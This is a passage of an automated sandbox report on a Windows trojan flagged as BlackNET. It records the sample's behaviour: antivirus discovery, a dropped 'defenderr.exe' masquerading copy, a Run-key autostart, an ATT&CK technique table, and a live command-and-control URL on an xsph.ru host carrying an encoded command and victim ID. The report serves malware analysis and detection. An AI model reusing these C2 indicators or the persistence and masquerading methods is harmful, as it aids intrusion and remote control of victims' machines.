Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Queries volume information: C:\ProgramData\Microsoft\MyClient\defenderr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe VolumeInformation
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Queries volume information: C:\ProgramData\Microsoft\MyClient\defenderr.exe VolumeInformation

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Source: Amcache.hve.6.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.552189300.000000001BE88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r\MsMpeng.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.552189300.000000001BE88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information

Yara detected BlackNET

Source: Yara match	File source: 5.2.defenderr.exe.2da0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.defenderr.exe.2da0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: defenderr.exe PID: 6640, type: MEMORYSTR

Remote Access Functionality

Yara detected BlackNET

Source: Yara match	File source: 5.2.defenderr.exe.2da0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.defenderr.exe.2da0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: defenderr.exe PID: 6640, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	441 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	112 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	49%	ReversingLabs	Win32.Trojan.Variadic
HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	52%	Virustotal		Browse
HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	100%	Avira	HEUR/AGEN.1352438
HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Microsoft\MyClient\defenderr.exe	100%	Avira	HEUR/AGEN.1352438
C:\ProgramData\Microsoft\MyClient\defenderr.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\MyClient\defenderr.exe	49%	ReversingLabs	Win32.Trojan.Variadic
C:\Users\user\Desktop\svchosts.exe	72%	ReversingLabs	ByteCode-MSIL.Trojan.GenericML

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.typography.net	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.sandoll.co.kral	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://en.wb84ti	0%	Avira URL Cloud	safe
http://www.sandoll.co.krFmalz	0%	Avira URL Cloud	safe
http://www.sandoll.co.kraleD	0%	Avira URL Cloud	safe
http://www.sandoll.co.krcomwght	0%	Avira URL Cloud	safe
http://www.sandoll.co.kralK	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
f0575824.xsph.ru	141.8.197.42	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://f0575824.xsph.ru/blacknet	false		high
http://f0575824.xsph.ru/blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.com	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.375008450.000000001BCA5000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://f0575824.xsph.ru	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://en.wb84ti	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.376426675.000000001BCA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.kralK	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.375008450.000000001BCA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.net	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374623062.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374562912.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374577774.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374456004.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374486664.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374603957.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374670691.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374536462.000000001BCA9000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374311470.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374396303.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374359510.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374507617.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html-si	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379438232.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379485933.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.421041056.000001502FFA1000.00000004.00000800.00020000.00000000.sdmp, defenderr.exe, 00000005.00000002.425763235.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000A.00000002.478081325.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, defenderr.exe, 0000000D.00000002.560257474.000000000289D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.krFmalz	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374945390.000000001BCA4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000001.00000003.393928679.0000015031C4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.421041056.0000015031379000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.393928679.0000015031DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.393928679.0000015031D25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.393928679.0000015031CF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://www.sandoll.co.kraleD	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374945390.000000001BCA4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.krcomwght	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.375008450.000000001BCA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379438232.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379485933.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.379515632.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kral	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.375008450.000000001BCA5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.197.42	f0575824.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	889805
Start date and time:	2023-06-18 09:32:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Detection:	MAL
Classification:	mal100.troj.evad.mine.winEXE@12/17@2/2
EGA Information:	Successful, ratio: 33.3%
HDC Information:	Failed
HCA Information:	Successful, ratio: 97% Number of executed functions: 90 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 52.182.143.212
Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, watson.telemetry.microsoft.com
Execution Graph export aborted for target HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, PID 496 because it is empty
Execution Graph export aborted for target defenderr.exe, PID 2080 because it is empty
Execution Graph export aborted for target defenderr.exe, PID 6640 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6928 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:33:18	API Interceptor	19x Sleep call for process: powershell.exe modified
09:33:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
